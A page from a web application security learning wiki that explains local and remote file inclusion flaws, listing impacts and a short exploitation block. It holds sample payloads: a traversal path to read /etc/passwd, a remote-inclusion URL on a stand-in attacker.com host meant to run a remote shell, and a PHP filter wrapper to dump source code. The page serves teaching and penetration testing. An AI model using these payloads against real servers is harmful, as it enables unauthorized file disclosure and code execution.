AppSecExplained
  • Index < START HERE
    • My courses
    • How to get started from zero
  • 📽️Live Stream Content
    • Resource of the week
  • Discovery / Recon
    • Methodology
    • Content discovery / recon
      • Subdomains
      • Endpoints
      • Parameters
      • Spidering
  • Common vulns
    • SQL injection overview
      • Detection
      • Blind SQLi
      • Second-order SQLi
      • SQLi lab setup & writeups
    • NoSQL injection
    • JavaScript injection (XSS)
      • XSS Methodology
    • File Inclusion
      • Local file inclusion
        • Directory traversal
    • Command injection
    • XXE (XML external entity) injection
      • Blind XXE
    • Template injection
      • Server-side template injection
      • Client-side template injection
    • Authentication
      • Attacking password-based authentication
      • Attacking MFA
      • Authentication lab setup & writeups
    • Cross-Site Request Forgery (CSRF)
    • Insecure deserialization
      • PHP
      • Java
      • Python
      • .NET
    • Server-side request forgery (SSRF)
    • Insecure file upload
    • Clickjacking
    • Open redirect
    • Vulnerable components
    • Race conditions
      • Limit overrun
    • Prototype pollution
      • Client-side prototype pollution
    • APIs
      • API: BOLA
      • API: Broken authentication
      • BOPLA
      • API: BFLA
  • Bypassing controls
    • Rate limiting
    • WAF Bypasses
  • Scripts
    • Docker-compose.yml files
      • Wordpress
      • SQLi testing labs
    • PHP scripts
      • RCE Function Check
    • Wordlists
      • Single characters
      • SQLi
  • Code review
    • Getting started
    • Sinks
  • Links worth your time
    • Practical API Hacking
    • Rana Khalil's Web Security Academy Course
    • Portswigger's Web Security Academy
    • TCM Security Discord
    • PentesterLand Writeups
Powered by GitBook
On this page
  • What is it?
  • Checklist
  • Exploitation// Some code

Was this helpful?

  1. Common vulns

File Inclusion

What is it?

File Inclusion vulnerabilities allow an attacker to include files on a server through the web browser. This can occur in two forms: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI exploits enable attackers to read files on the server, while RFI allows attackers to execute arbitrary code by including remote files over the internet.

A simple example

  • A vulnerable web application has the endpoint /page?file={filename}

  • When a request is made, the application dynamically includes the content of the file specified in the query parameter, for example, PHP's include() function: include($filename);

  • If an attacker modifies {filename} to a path such as ../../etc/passwd or a remote URL http://attacker.com/malicious.php, they can read sensitive files or execute malicious code.

It's important to note that the specific impact and exploitation techniques can vary depending on server configuration, programming language, and application logic. File Inclusion vulnerabilities can lead to:

  • Sensitive data exposure

  • Remote code execution

  • Cross-site scripting

Other learning resources:

  • [To be updated]

Writeups:

Have a good writeup & want to share it here? Drop me a message on LinkedIn.

Checklist

Exploitation// Some code

# Basic LFI to read 
/etc/passwd 
../../../../etc/passwd
# RFI to execute a remote shell 
http://attacker.com/malicious.php
# Using PHP wrappers to bypass restrictions 
php://filter/convert.base64-encode/resource=index.php
PreviousXSS MethodologyNextLocal file inclusion

Last updated 1 year ago

Was this helpful?